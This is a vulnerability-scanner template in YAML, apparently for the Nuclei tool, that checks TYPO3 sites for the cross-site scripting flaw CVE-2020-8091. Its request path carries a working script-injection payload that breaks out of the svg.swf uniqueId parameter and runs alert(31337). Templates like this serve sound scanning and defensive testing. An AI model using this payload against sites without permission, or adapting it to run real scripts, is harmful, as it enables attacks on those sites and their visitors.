24 lines
529 B
YAML
24 lines
529 B
YAML
|
id: CVE-2020-8091
|
||
|
|
||
|
info:
|
||
|
name: TYPO3 Cross-Site Scripting Vulnerability
|
||
|
author: dwisiswant0
|
||
|
severity: medium
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "31337"
|
||
|
part: body
|
||
|
- type: word
|
||
|
words:
|
||
|
- "application/x-shockwave-flash"
|
||
|
part: header
|